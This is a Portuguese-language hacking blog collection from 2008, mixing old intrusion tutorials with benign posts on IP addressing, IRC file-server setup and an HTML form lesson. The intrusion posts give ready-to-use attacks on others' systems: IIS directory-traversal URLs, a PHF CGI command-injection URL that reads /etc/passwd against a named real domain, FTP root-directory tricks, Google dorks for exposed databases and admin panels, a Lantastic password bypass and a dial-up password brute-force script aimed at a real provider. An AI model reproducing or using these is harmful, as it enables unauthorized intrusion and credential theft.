OBS: Nunca crackeie um programa da MS, coitado do nosso querido amigo BiLL Gayts, ele faz seus programinhas com tanto carinho, ganha tão pouco dinherinho, então um crackzinho, um milhão$inho, um bugizinho, um windowzinho, um doszinho, um ntzinho a mais outro a menos..... :) (não que eu esteja falando mal dele).É um erro no Internet Information Server (IIS). Ele permite a você pegar aquivos fora dos diretórios públicos Se você tentasse http://legal.com.br/config.sys você não conseguiria... Nosso amigo BiLL Gates, como ele é generoso... Vamos supor:http://www.hack-me.com.br/htmls/main.htme vamos supor que o arquivo na máquina do cara seja:c:\iis\htmls\main.htm então se você fizer http://www.hack-me.com.br/htmls/../../windows/win.ini você teria o win.ini do cara http://www.hack-me.com.br/htmls/../../config.sys voce teria o config.sys do www.hack-me.com.br Mas lembre-se isso só vai funcionar se o servidor http for wIndows NT, não conheço nenhum.

INVASÃO VIA BROWSER

2008-06-05T05:02:00.000-07:00

INVASÃO VIA BROWSER

O ataque via browser é um dos ataques mais faceis de executar, mas não da nem 50% de sucessos nos ataques. Vou tentar explicar como você usa esse metódo: Primeiramente você tem que entender o que está fazendo, não adianta selecionar a dica aperta CTRL+C e colocar no navegador achando que ele vai fazer tudo para você não, entenda:
Bom, como já sabe o geralmente o arquivo "passwd" é o que contém os passwords encripitados (se você nao sabe ainda, dá um olhada na seção "SISTEMA UNIX"), existem vários servidores que só Root pode entrar no diretório "/etc", para outros usuarios é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém um arquivos chamdo PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer hackear.

Ex:
http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Bom, mas se você usar um pouco a cabeça vai ver que para que não de nada errado e você pode usar o anonymizer (Se você não ainda o que é o anonymizer, dá uma olhada na seção Anônimo), bom não é certeza que dá pra usar não porque eu nunca tentei, mas pela lógica dá.

Invasão por IP

2008-06-05T05:00:00.002-07:00

Invasão por IP
Alegria de uns, tristeza de outros, na verdade, aqueles que utilizam a rede Dial-Up do Win95 para sua conecção com a internet podem estar correndo sérios riscos a não ser,é claro, que assim conectam-se propositalmente, com intenções"diversas".
Utilizar-se de uma conecção.PPP do Win95 num provedor de acesso, significa estar disponibilizando seu computador a todos os usuário da net. Mesmo sem o compartilhamentode arquivos, existem diversas ferramentas que permitem a outra pessoa conectar-seao seu computador caso você esteja utilizando esse tipo de conexão.
Conecte-se à Internet utilizandoa rede Dial-Up do Win95. Se o seu provedor não disponibilizar umaconecção do tipo PPP, estas dicas não funcionarão.
Verifique antes, se você possuios drivers clientes para redes Microsoft. Caso não estejam instalados,instale-os através do Painel de Controle, no ícone Redes.
Verifique também se o compartilhamentode Arquivos e Impressoras está instalado.
Se estiver, você estará sujeitoà que outra pessoa conecte-se ao seu computador simplesmente sabendoseu IP. Se bem que, para aqueles que já sabem, existem mil maneirasdiferentes de se "burlar" a fraquinha segurança do Win95. Para vocêpoder encontrar outros computadores compartilhados, você deve configurarWINS e LMHOSTS. O WINS é utilizado para localizar os computadorescom IP fixo. O LMHOSTS, é acionado automaticamente na procura decomputadores que possuem IP dinâmicos.
Configurar essas opçõesé simples. Vá ao Painel de Controle e abra Rede. Verifiqueas propriedades do protocolo TCP/IP. Alí você encontraráa opção para ativar a resolução WINS. No casode você não conhecer nenhum servidor WINS, utilize 204.118.34.6como primário e 204.118.34.11 como secundário. Esses servidoressão dos USA, e gratuítos. Caso queira outros endereços,utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS,você precisa criar um arquivo texto simples, utilizando-se atámesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS.É nesse arquivo que ficarão os endereços de IP e os nomes dos computadores que você terá acesso. Para localizarum determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço.Se você executar o programa NBSTSTAT, seguido da opção-N, você obterá essa lista, com o nome e o IP de seu computadorsempre sendo o primeiro da lista, seguido das outras máquinas disponíveis,tudo numa janela DOS. Através do Explorer você poderáver os computadores disponíveis na rede,dos quais você aindapoderá utilizar os discos mapeando-os, o que os tornará unidadesde seu computador.

INVASÃO POR FTP

2008-06-05T05:00:00.001-07:00

INVASÃO POR FTP

Vá ao MS-DOS e digite FTP , ao aparece o prompt ftp, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP , Ex.: (to) ftp.convex.com.br Ao conectar ele pedira a senha e o Password, nao entre com seu e-mail nem com a sua senha se estiver hackeando o seu provedor!! NUNCA DIGITE NADA NO USERS E NO PASSWORDS No login precione ENTER, no password precione Novamente... Irá aparecer o prompt ftp, novamente..., ai é só digitar : quote user ftp , pressione ENTER e digite: quote cwd ~root Precione ENTER novamente e digite: quote pass ftp Pronto, vc esta Hackeando... Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX.... Ao entrar vc vai estar no Diretório do login, Ex.: homeroot Para ver a lista de users vc volta um dir vá para o dir home e cada dir é um usuário,... tente pegar as senhas ,mais pegando as senhas a outro porem, ela são todas cryptografadas!Pegue vc mesmo um descrypto e pronto!!!

Hacking Google

2008-06-05T04:59:00.000-07:00

Bom, que o google.com ja foi parte fundamental em varios hackings famosos quase todo mundo ja sabe... o problema eh que nunca encontrei um artigo que explicasse como eh possivel tranformar o google.com em uma poderosa ferramenta hacking. Por este motivo decidi escrever um artigo basico sobre isto.
Utilidades:
Eh possivel utilizar o google.com para encontrar paginas de administracao que nao possuem nenhuma protecao, e que por este motivo sao colocadas escondidas em servidores web. Tambem eh possivel encontrar arquivos de database, documentos importantes, etc. Claro para encontra algo valioso voce gastara algum tempo fazendo
buscas e filtrando os resultados.
Explicacao de comandos:
"site:" faz uma busca dentro de um dominio.
ex.: "big brother site:globo.com" vai listar todas as paginas no dominio globo.com que contem "big brother".
"allintitle:" faz uma busca por paginas que contem palavras especificas no titulo.
ex.: "allintitle:seja bem vindo" busca todas as paginas com titulo contendo as seguintes palavras "seja bem vindo".
"allinurl:" faz uma busca por enderecos de url que contem palavras especificas.
ex.: "allinurl:contato.asp" busca todos os sites contendo
"contato.asp" na url.
Para mais comandos, basta acessar e ler o help do google.com
Exemplos de uso como ferramenta hacking:
"allinurl:usuarios.mdb site:.com.br" busca por arquivos de banco de dados nomeados "usuarios.mdb" dentro do dominio mae ".com.br"
"allintitle:admin panel site:.org" busca por supostas paginas de administracao dentro do dominio
".org"
"allinurl:login.asp"
lista todas as paginas com nome de "login.asp", e em alguns casos o google exibira uma versao "cache" da pagina onde sera possivel ver o codigo asp.
Bom, quem ja me conhece, sabe que sou pessimo para escrever artigos e explicacoes. Mas acredito que se voce realmente tem potencial para estar na area de seguranca, voce eh capaz de entender a ideia principal deste artigo e aprimora-la.
Abracos,

Hackeando Lantastic

2008-06-05T04:58:00.000-07:00

Hackeando Lantastic
Como já sabemos a Lantastic 6.0 é considerada a melhor rede ponto-a-ponto do mercado, mas descobri um erro banal, onde você pode ter acesso aonet_mgr que é o programa onde se tem controle total de usuários e restrições. Ai vai, Localize dentro do diretório LANTASTI.NET o subdir SYSTEM.NET, dentro deste subdir você encontrara o arquivo com nome Zcontrol. Agora é só renomear este arquivo e pronto, você tirou a senha do net_mgr da Lantastic 6.0.

Hackeando provedores com o loginhack

2008-06-05T04:57:00.002-07:00

Hackeando provedores com o loginhack
O que esse programa faz é conectar-se ao provedor e testar as diver- sas senhas de uma wordlist para consegir estabelecer uma conexão. Primeiro vc deve acertar seu script. Eu uso o Dec-serv feito pelo Tron X e que jah vem por default com o programa. Edite-o e mude as linhas:
init_modem=z
init_data=8n1
LOGFILE=xxxxxx.log
PHONE_NR=xxxxxx
DIAL_TRIES=0
LOGIN_TRIES=0
DIC(1)=word.dic
Para
init_modem=atz
init_data=8n1
LOGFILE=uol.log
PHONE_NR=2100045
DIAL_TRIES=0
LOGIN_TRIES=0
DIC(1)=wordlist.dic

Acima estão as configurações necesarias para hackear a uol. Mude-as adequadamente ao seu provedor. Para compila-lo use o Lh-comp.exe assim:
lh-comp dec-serv.txt
Isso criará o dec-serv.scr . Agora rode o programa. Se ainda precisar configurar os dados acima entre no Setup. Se está tudo certo selecione Load compiled Script [L]. Ae quando pedir o nome do script digite ? para lista-los. Então digite o nome do script(se fez tudo certo será dec-serv.scr). Após carregar o script digite S para iniciar. Pronto! Agora é só esperar que talvéz demore um pouco.

Hackeando Home Page

2008-06-05T04:57:00.001-07:00

Hackeando Home Page
Antes de mais nada é importante salientar que nos EUA existe leis contra Crime Virtual, mas no Brasil ainda não. Existe uma lei transitando no congresso a esse respeito, mas enquanto não é aprovada, não existe acusação de Crime Virtual. Mas não quer dizer que você pode invadir uma
Home Page. Porque mesmo não tendo uma acusação de Crime Virtual, você pode ser processado por perdas e danos, por exemplo. Pense muito bem antes de fazer qualquer besteira.
Bom, agora que você já leu o aviso, vamos ao que interessa. Antes de mais nada: você já usou o IRC? Não é essencial, mas se já usou a BrasNET já deve ter percebido que quando você entra num canal registrado vazio, e o ChanServ está com lag, demora para identificar o canal como registrado. Nesse meio tempo você fica como OP, até o ChanServ identificar o canal. Tem gente que até rouba canais assim. Para invadir uma HP você parte do mesmo princípio. Você dá um ping grande no domínio em que quer entrar. Caso o ping for suficientemente grande o server cai.
Quando ele estiver voltando você entra. Quando todos os sitemas estiverem recuperados você pode ser derrubado do domínio (espero que sem fazer nada de errado). E nem adianta que da sua casa você não pode dar um ping suficientemente grande num domínio para derrubá-lo. Também não vou dizer como você pode fazer para derrubar o domínio. Como disse desde o início, é só para você saber como fazer, não é para pôr isso em prática.
Texto traduzido por Mino e retirado da Caverna.

Entenda o ip

2008-06-05T04:56:00.001-07:00

entenda o ip
Os endereços IP são números com 32 bits, normalmente escritos como quatro octetos (em decimal), por exemplo 128.6.4.7. A primeira parte do endereço identifica uma rede especifica na inter-rede, a segunda parte identifica um host dentro dessa rede. Devemos notar que um endereço IP não identifica uma máquina individual, mas uma conexão à inter-rede. Assim, um gateway conectando à n redes tem n endereços IP diferentes, um para cada conexão. Os endereços IP podem ser usados para nos referirmos a redes quanto a um host individual. Por convenção, um endereço de rede tem o campo identificador de host com todos os bits iguais a 0 (zero). Podemos também nos referir a todos os hosts de uma rede através de um endereço por difusão, quando, por convenção, o campo identificador de host deve ter todos os bits iguais a 1 (um). Um endereço com todos os 32 bits iguais a 1 e considerado um endereço por difusão para a rede do host origem do datagrama. O endereço 127.0.0.0 e reservado para teste (loopback) e comunicação entre processos da mesma máquina. IP utiliza três classes diferentes de endereços. A definição de classes de endereços deve-se ao fato do tamanho das redes que compõem a inter-rede variar muito, indo desde redes locais de computadores de pequeno porte, até redes públicas interligando milhares de hosts. Na primeira classe de endereços, classe A, o bit mais significativo e 0 (zero), os outros 7 bits do primeiro octeto identificam a rede, e os 24 bits restantes definem o endereço local. Essa classe de endereços e usada para redes de grande porte, os endereços de rede variam de 1 a 256, e cada redetem capacidade de endereçar cerca de 16 milhões de hosts. A Arpanet e um exemplo de uma rede com endereços classe A. A classe B de endereços usa dois octetos para o número da rede e dois para endereços de hosts. Os endereços de redes classe B variam na faixa de 128.1 até 191.255 (os números 0 e 255 do segundo octeto, e 127 no primeiro são usados para funções especiais), e cada rede pode interligar cerca de 65 mil hosts. Finalmente, os endereços classe C utilizam três octetos para identificar a rede e um para o host. Os endereços de rede situam-se na faixa de 192.1.1 até 223.254.254, e cada rede pode endereçar 254 hosts. Os endereços acima de 223 no primeiro octeto foram reservados para uso futuro.Alexandre Lopes 27-Lan&Unix - CENTROIN From: ANDRE FUCS To: ALL Subj: IP e menos IPs... :) Date: 10-05-96 Number: 3422 Oi ALL Resolvi procurar.... -Lan&Unix L - CENTROIN From: ALEXANDRE LOPES To: ALL Subj: Protocolo IP Date: 10-05-96 Number: 3425 Encontrei este texto em um livro sobre redes de computadores e o achei bastante interessante: O Protocolo IP (Internet Protocol) O IP foi projetado para permitir a interconexão de redes de computadores que utilizam a tecnologia de comutação de pacotes. O ambiente inter-rede consiste em hosts conectados a redes que por sua vez sao interligadas através de gateways. As redes que fazem parte da inter-rede variam de redes locais (por exemplo, redes Ethernet) até redes de grande porte (por exemplo, a Arpanet). Os gateways da Internet são também chamados de routers (roteadores). Ao contr rio do protocolo X.25, o protocolo IP e um protocolo sem conexões. Sua função e transferir blocos de dados denominados datagramas da origem para o destino, onde a origem e o destino são hosts identificados por endereços IP. O protocolo IP também fornece o serviço de fragmentação e remontagem de datagramas longos, quando necessário, para que eles possam ser transmitidos através de redes onde o tamanho máximo permitido para os pacotes e pequeno. O serviço oferecido pelo IP ‚ sem conexão. Portanto, cada datagrama IP ‚ tratado como uma unidade independente que não possui nenhuma relação com qualquer outro datagrama. A comunicação ‚ não-confiável, não sendo usados reconhecimentos fim a fim ou entre nós intermediários. Nenhum mecanismo de controle de erros nos dados transmitidos ‚ utilizado, exceto um checksum do cabeçalho que garante as informações nele contidas, que são usadas pelos gateways para encaminhar os datagramas, estão corretas. Nenhum mecanismo de controle de fluxo ‚ empregado. Algumas das principais caracter¡sticas desse protocolo são: Serviço de datagrama não-confiável Endereçamento hierárquico Facilidade de fragmentação e remontagem de pacotes Identificação da importância do datagrama e do n¡vel de confiabilidade exigido Identificação da urgência de entrega e da ocorrência futura ou não de pacotes na mesma direção (pré-alocação, controle de congestionamento) Campo especial indicando qual o protocolo de transporte a ser utilizado no n¡vel superior Roteamento adaptativo distribu¡do nos gateways Descarte e controle de tempo de vida dos pacotes inter-redes no gateway Alexandre Lopes - ALL, Endereços IP em Redes TCP/IP Toda interface de host ou nó em uma rede TCP/IP ‚ identificada por um endereço IP exclusivo. Esse endereço ser utilizado para identificar o host em uma rede; ele especifica também informações de roteamento em inter-redes. O endereço IP identifica um computador como um endereço de 32 bits exclusivo através de uma rede TCP/IP. Um endereço ‚ em geral representado por uma notação de decimais separados por ponto, que representa cada octeto de um endereço IP como seu valor decimal e separa cada octeto com um ponto. Ex: 102.54.94.97 ID de Rede e ID de Host Embora um endereço IP seja um valor único, ele contém duas partes de informações: a ID de rede e a ID de host (ou sistema) referente ao seu computador. -A ID de rede identifica um grupo de computadores e outros dispositivos, todos localizados em uma mesma rede lógica, separados ou conectados entre si por roteadores. Em inter-redes (redes formadas por um conjunto de redes locais), há uma ID de rede exclusiva para cada rede. -A ID de host identifica o seu computador dentro de uma ID de rede espec¡fica. (Host ‚ qualquer dispositivo conectado com a rede que utilize TCP/IP) As redes conectadas com a Internet deverão obter uma ID de rede oficial na InterNIC para garantir uma exclusividade de ID de rede IP. Depois de receber a ID de rede, o administrador da rede local dever atribuir IDs de host exclusivas aos computadores da rede local. Embora as redes privativas não conectadas com a Internet possam escolher utilizar seus próprios identificadores de rede, uma ID de rede válida da InterNIC permitir que uma rede privativa estabeleça conexão com a Internet posteriormente sem que seja preciso atribuir endereços novamente. A comunidade Internet definiu classes de endereços, de forma a acomodar redes de diferentes tamanhos. Cada classe de rede poder ser identificada a partir do primeiro octeto de seu endereço IP. A tabela a seguir apresenta um resumo do relacionamento entre o primeiro octeto de um endereço espec¡fico e seus campos de ID de host e Id de rede. Ela também identifica o número total de IDs de rede e IDs de hosts para cada classe de endereço. Esse exemplo usar w.x.y.z para designar os bytes do endereço IP. Classes de Endereços IP Classe | Valores w | ID de rede | ID de host | Redes Disp. | Host/Rede A | 1326 | w | x.y.z | 126 | 16.777.214 B | 128391 | w.x | y.z | 16.384 | 65.534 C | 192-223 | w.x.y | z | 2.097.151 | 254 Nota: O endereço 127 ‚ reservado para teste de loopback e comunicações entre processos no computador local; não é um endereço de rede válido. Os endereços 224 e acima são reservados para protocolos especiais (IGPM multicast) e não podem ser utilizados como endereços de host. Um host de rede utiliza uma ID de rede e uma ID de host para determinar qual pacote deve receber ou ignorar e para determinar o escopo de suas transmissões (apenas os nós com a mesma ID de rede suportam broadcasts no n¡vel do IP). Pelo fato de o endereço IP do remetente estar inclu¡do em todos os pacotes IP de sa¡da, ser útil para o computador de destino obter a ID de rede de origem e a ID de host do campo de endereço IP. Isso ser feito através de máscaras de sub-rede.

COMO FICAR ANONIMO NA NET

2008-06-05T04:55:00.001-07:00

COMO FICAR ANONIMO
Quando você for fazer alguma atitude hacker, é fundamental estar anônimo, ou seja, estar com seu endereço IP (Internet Protocol) anônimo, é como ficar "invisível". Para isso, existe um serviço muito barato e fácil de ser usado, o Anonymizer, que faz o mesmo papel do spoof.
Para utilizar, é muito simples, basta digitar http://www.anonymizer.com:8080/ e o endereço á ser acessado anônimamente. Se você for acessar anônimamente o ZAZ por exemplo, ficará assim: http://www.anonymizer.com:8080/http://www.zaz.com.br
Maiores informações sobre o Anonymizer em

Tutoria Fserver Elaborado Por Soujiro Seta!!

2008-06-05T04:48:00.000-07:00

Aew galera, acabou a desculpa de que não sei fazer um fserver. Esse tutorial irá ensinar você a montar seu próprio fserver, passo a passo.
Para quem não sabe ainda o que é um fserver, leia o tutorial anterior XD, pois este destina-se diretamente a criação, e não a explicação.

Antes de partir para o tutorial propriamente dita, alguns tópicos pressisam ser passados:

- Assim como fiz no tutorial básico, colocarei uns comentários, um tanto que pessoais e cômicas. Caso você se ofenda, peço desculpas, mas esse tutorial não foi feito para ser tecnico, mas sim interativo ^^ ;
- As opções entre /ctcp ou normal fica a seu critério. Existem canais que soh aplica voice (+) aos fservers /ctcp, outros canais não ligam pra isso, contanto que o seu fserver esteje funcionando :P
- Particularmente, eu uso o modo normal. Se o canal só aceita /ctcp, como que fica, eles só aceitam pessoas com esse tipo de fserver?? Claro que não. Sinceramente, acho muito errado discriminarem fservers, pois VOCÊ, leitor, já está tendo paciência em me aturar e, ainda está tendo muito mais paciência em compartilhar. Merecemos mais respeito. A diferença (pelo que sei) é no comando, onde no /ctcp o trigger possui /ctcp, enquanto no normal não, podendo ser qualquer comando. (obs.: se você for usar o modo normal, utilize comandos que comecem com !,por exemplo, !musicas. Colocar de qualquer forma o comando trigger é um desrespeito ao canal);
- Muitos canais proibem a propaganda temporária. Este tutorial procurará fazer seu fserver ser anunciado com o comando !list.
- Ao final de cada explicação, terá uma avaliação pessoal sobre o fserver do script. Nessa avaliação, pesa principalmente a dificuldade de criação e a operãçao do fserver. No critério Complexidade, quanto menor a nota melhor;
- OBS MUITO IMPORTANTE: Se você souber outro modo de fazer um fserver com outros scripts (ou sobre esses mesmos aqui ensinados), ou tenha alguma explicação que esteje errada, procure-me e, me ensine. Gente, sou humano também. Sou falho, pobre e louco como todo mundo XD. Além disso: esse tutorial foi feito com amor por um cara da área de exatas. Concordâncias e etc e tal estão fora de cogitação. Caso você queira me fazer o favor de corrigir, fique a vontade. Só não quero que este fserver se destorsa. Para ser sincero: Matematica rules :P.

- ÍNDICE
- SYSRESET
- CYBERSCRIPT
- SCOOP
- THE SEVEN DEADLY SIN
- UPP

Pelo fato de serem os scripts mais usados e conhecidos, estarei ensinando cada um, detalhadamente. Para os outros scripts, de início, necessitarei do setup.exe, para depois começar o "how to".

- Sysreset
versão utilizada: 2.53

- Prós: é um dos fservers mais fáceis de sse configurar, sem muitos detalhes.

- Contra: tudo em inglês :-(, dessa forma,, cabe a VOCÊ entender o que estou fazendo aqui XD, brincadeira. Ter uma noção básica em inglês ajudará. Além disso, por ser muito simples, falta algumas configurações para deixar o fserver mais interativo e divertido.

- Fserver: primeiro, vá em Sysreset => Fille Server Manager;
Na janela que abriu, vá na orelha File Server Triggers;
Deixe a opção "Enabled" ativada (por motivos óbvios, sem isso o fserver não liga :P);
Como já foi dito, /ctcp ou não fica ao seu critério: se sim, deixe ativado; se não desative (óbvio XD);
Deixe no "Access Mode" na opção "No Restrictions" (isso é um fserver público, não o Clube do Bolinha, onde poucos e privilegiados tem acesso. Se você quiser mudar essa opção, isso torna-se particular seu);
Deixe a opção "Respond to !List" ativado, isso será útil no futuro;
Clique em "Add";
Selecione um comando como trigger (isso fica a seu gosto, mas lembre-se, se for modo normal, coloque um ! no comando);
Nessa outra janela, está perguntando se você deseja inserir algum texto em forma de arquivo .txt como sendo uma mensagem de boas vindas. Eu particularmente não uso, mas isso fica a seu gosto. Se tiver algum arquivo .txt que você queira usar, indique-o, se não, basta clicar em cancelar;
Nessa nova janela, indique a pasta que você quer compartilhar com as pessoas. Todos os arquivos contidos nessa pasta serão compartilhados.
Após esses passos, vá na orelha "Server Config";
Essas configurações são ao gosto pessoal. Irei indicar uma configuração básica ótima para fservers;
Em "Max Sends" deixe assim: Each = 1 e Total = 2;
Em "Max Queues" deixe sem limite (essa opção limita o número máximo de pedidos para uma fila, eu prefiro deixar sem limite)
As outras coisas não possuem tanto significado para ficar detalhando. Vá em "Basic Options" e mude para "Advanced Options";
Nessa sessão, fica mais ao gosto seu se quer mostrar informações (as vezes fúteis, as vezes interessantes). Pessoalmente, eu gosto de mostrar. Quem não quiser ver, feche os olhos XP. Se você tem gostado dos meus gostos pessoais, e tem seguido, nessa parte, todas as opções do lado direito deixe ativadas. Se não, faça do seu gosto XD, você é livre para tomar suas próprias decisões XD. Desculpe a minha preguiça, mas tenho outros scripts para explicar, e ficar explicando coisa por coisa consome tempo (que por sinal não tenho :P);
Após a configuração acima, clique em "Done";
Está quase terminando, falta apenas 1 detalhe: a propaganda;
Vá em Sysreset => Servers Active => Silent with !List;
Pronto, agora desfrute o seu fserver nos canais. Caso você queira restringir a alguns canais, vé em Sysreset => File Server Manager;
Vá na orelha File Server Triggers, clique no trigger correspondente ao fserver que você quer restringir a algum canal;
Desative a opção "All Channels", e no campo acima digite os canais no qual você quer que o fserver opere. No final, clique em "Done" e seu fserver estará restrito a apenas aquele(s) canal(is).

Nota para esse fserver: 8,7
Complexidade: 5,0

- CYBERSCRIPT
versão utilizada: 3.0

- Prós: possui dificuldade razoável. O scrript encontra-se em português, facilitando NOSSAS vidas (isso significa menos explicações XD - brincadeira ^^).

- Contras: o Cyber abre uma outra janela, ou seja, para ter um fserver ativo é preciso ter um clone.

- Fserver: Vá em Opções/Comandos => Utilittários => Fserver;
Na nova janela, aperte F1, ou vá em Opções/Comandos => Configuração;
Deixe a opção Fserver ligado;
Novamente pergunta-se o comando (via canal ou ctcp - deixo por sua conta :P);
Após decidir o comando, clique no botão ao lado de "Pasta dos Arquivos", e selecione a pasta a ser compartilhada;
Na parte de descrição, seje gentil com quem procura, coloque o tipo de arquivo que você está compartilhando. Isso facilita buscas (mesmo existindo o comando @find, mas isso é detalhe XD);
Se você exige uma leitura de regras e coisa e tal, ative a opção, e clique no botão ! para criar suas regras. Isso vale para o "Exibir aviso de entrada";
Deixe ativado os dois últimos botões (Logar envios e recebimentos, e Ativar @find/@locator);
Na parte de créditos, deixe livre. Isso é um fserver público, não celular de cartão XD;
Na orelha Limites, o padrão estabelecido está de um bom tamanho. Mude essas configurações conforme sua necessidade;
Na orelha Propagandas, desabilite "Utilizar propaganda nos canais". Ative "Responder a !list em canal". Caso você queira diminuir os lags, deixe um intervalo entre avisos por volta de 1 min (60 segundos pra quem não sabe :P). Caso você não ligue, deixe com um intervalo de tempo menor;
Na parte de canais, diga se você quer compartilhar em todos os canais em que estiver presente, ou somente para alguns canais;
Após tudo isso, clique em Fechar, e conecte o seu "bot";
Prontinho, um novo fserver acabou de nascer, e parece com a cara do pai/mãe XD.

Nota para esse fserver: 8,0
Complexidade: 4,0

- Scoop
versão utilizada: 2004

- Prós: O script encontra-se em português,, facilitando a vida dos brasileiros ^^.

- Contras: Assim como o CyberScript, o Scooop abre uma janela a parte; Até hoje não encontrei onde desativa a propaganda em canal e ativa somente a do comando !list. Caso exista e você saiba onde fica, me ensine ^^, afinal, sou humano também ^^.

- Fserver: vá em Scoop Script => File Servver => Abrir o Fserver;
Na nova janela, vá em Scoop Script => Configuração;
Deixe a opção "File server ligado" ativado;
No "Tipo de servidor", prefira o modo de Acesso Livre;
Na parte de limites, estabeleça os que melhores lhe convém. Esse padrão aparenta uma boa configuração;
Na "Palavra Chave", coloque a palavra que será utilizado como trigger;
Em "Pasta dos arquivos", clique no botão abaixo e indique a pasta a ser compartilhada;
Na parte "Servindo", fica a seu critério se coloca algo explicando o conteúdo da pasta;
Se você exige a leitura das regras, ou aviso do fserver, ative as opções e clique no botão ao lado para editar sua mensagem;
Após tudo isso, clique em Configurar Propagandas;
Como até hoje não achei somente a propaganda por !list, cabe a você decidir como quer a propaganda. Eu recomendo procurar um OP do canal que você irá distribuir, para perguntar se eles autorizam a sua propaganda, e de que forma. Pergunte o tempo de intervalo. O problema maior é que a maioria dos canais por onde passei, não aceitam propagandas desse tipo. Ou seja, esse estilo de fserver não é recomendável, pois é passível de punições;
Assim que você decidir a forma de propaganda, clique em ok e comece a disfrutar seu fserver.

Nota para esse fserver: 5,0
Complexidade: 5,0

- THE SEVEN DEADLY SINS
versão utilizada: 9.4

- Prós: script muito bom para conversaçõess, tendo uma aparência limpa, facilitando as leituras. O script pode ser encontrado em português.

- Contras: não é muito bom para fservers ((sempre tive problemas pra configurar no T7DS). Não sei onde fica (ou se existe) o botão !list. Bom, pelo menos até agora não encontrei.

- Fserver: vá em Comandos/Opções => Configgurações => Opções do Fserver;
Deixe a opção "Fserver ligado" ativado;
Na parte de pasta, clique no botão !, e escolha a pasta a ser compartilhada;
Na parte do tipo de IP, deixe no modo normal. A outra opção faz com que você se conecte no usuário, e não o contrário (que por sinal é o que acontece em todos os outros fservers ensinados aqui);
No comando de ativamento, bem, isso é contigo. Me deixe orgulhoso Bill XP;
O T7DS não trabalha com o comando @locator. Para isso ative-o, e indique a pasta em que ele irá funcionar (é claro que esta pasta deve estar disponível no fserver);
Após tudo isso, vá em Opções, e configure os totais de envios e recebimentos compatíveis com a sua banda;
Aqui encontramos um problema do T7DS: ele somente anuncia o fserve com propagandas, ou seja, da mesma forma que o Scoop, esse tipo de propaganda normalmente não é permitido. Consulte um OP antes de ativar o seu fserver, para ver se você não será punido pelo seu "spam" XP;
Como não tem como desativar a parte de créditos iniciais, deixe um crédito beeeem generoso;
Assim que tudo estiver pronto, ative seu fserver com o botão OK. Eis um novo fserver na rede \o/.
Uma configuração que fica a parte: toda vez que alguem entrar no seu fserver vai aparecer uma janela avisando sobre o requerimento de conexao. Uma coisa interessante a se fazer é, quando essa janela aparecer, desativar o botão que diz "Sempre mostrar esse aviso". Isso por 2 motivos: 1 = enche o saco ficar fechando toda vez quem alguem acessar o seu fserver; 2 = as vezes você sai e deixa o PC ligado compartilhando os seus arquivos (como todo bom samaritano). Como você não está no computador para autorizar o acesso, o outro user vai ficar "chupando o dedo", esperando acessar o seu fserver. Seje uma boa pessoa e desative essa janela. Os users agradecem ^^.

Nota para esse fserver: 5,0
Complexidade: 5,0

- UPP
versão utilizada: 2.0

- Prós: script com alto poder de fogo. Muiito bom, com bastante opções.

- Contras: muito complexo, dificultando a criação do fserver. Script somente em inglês.

- Fserver: vá em UPP => Control Painel;
Nessa nova janela, verifique se a opção fileserver encontra-se presente. Caso não, vá em modules, e procure a opção fileserver e ative. Dessa forma, na janela anterior estará presente a opção de configuração do fserver;
Na orelha "general", deixe a opção "enable fserver on start" ativada;
Vá para a orelha "shared", clique em add. Nessa nova janela, clique em browse e escolha a pasta que você quer compartilhar. Após isso, na opção abaixo, coloque um nome genérico para uma pasta. Explicação: O UPP guarda todos os fservers em uma pasta virtual chamada /. Para diferenciar um fserver de outro, cada fserver deve possuir uma pasta virtual dentro do diretório virtual /;
Logo após isso, clique nos botões update cache, changed mount preference;
Após isso, vá na orelha triggers, clique em add. Elabore seu comando e escolha opção normal ou ctcp;
Escolha os canais no qual esse fserver irá participar;
Na parte de "required channel access level" deixe any, se o seu fserver for de uso público, ou escolha o nível que a pessoa deve ser para acessar;
Deixe a opção "apply to !list reply" ativado;
Se você quiser mostrar uma mensagem de boas vindas ou regras, ative a opção "enable" na área de "welcome text";
Clique em "select" da sessão "queue pool" e escolha uma opção onde na coluna "used by" esteje uma opção fsever;
Na orelha "services", ative a opção "enable" da sessão "@find system"
Na orelha "fserve ad", na sessão "options", marque as opções que você quer mostrar quando alguem digitar !list (entre essas opções estão: record de download, arquivo mais requisitado, entre outras coisas fúteis, mas legais ^^);
Após tudo isso, clique novamente em "update cache", depois em Ok;
Vá em UPP => serving => fserver => force silent. Dessa forma, o seu fserver funcionará apenas com o comando !list;
Pronto. Mais um fserver pronto a servir ^^.

Nota para esse fserver: 9,0
Complexidade: 8,0

Tutorial elaborado por Soujiro_seta

Soujiro Nota 10 mano valew mesmo pela ajuda com seu super tutor de Fserver

B Recuperando Dados De Formulários

2008-06-02T07:17:00.000-07:00

Recuperando dados de formulários « VoidNull

1.1 - Escrevendo um formulário HTML

1.2 - Obtendo informações do formulário com javascript

1.3 - Tipos de Variavéis e Operadores

1.4 - Validando o formulário com funções javascript

1.1- Escrevendo um Formulário HTML

Vamos começar escrevendo uma página simples de cadastro de usuários.

1 <html>

2 <head>

3 <title>PegaDados</title>

4 </head>

5 <body>

6 <form name=”cadastro”>

7 <input type=”text” name=”usuario”>

8 <input type=”password” name=”senha”>

9 <input type=”button” value=”login”>

10 </form>

11 </body>

12 </html>

Claro, no código acima o que nos interessa realmente é o trecho do código que está em vermelho

entre as linhas 6 e 10, ou seja, o formulário.

Então vamos descrever tais linhas a começar pela linha 6.

6 <form name=”login” id=”formLogin”>

Esta linha inicia o formulário e atribui o Name “login” e o ID “formLogin” note que nas linhas 7 e 8

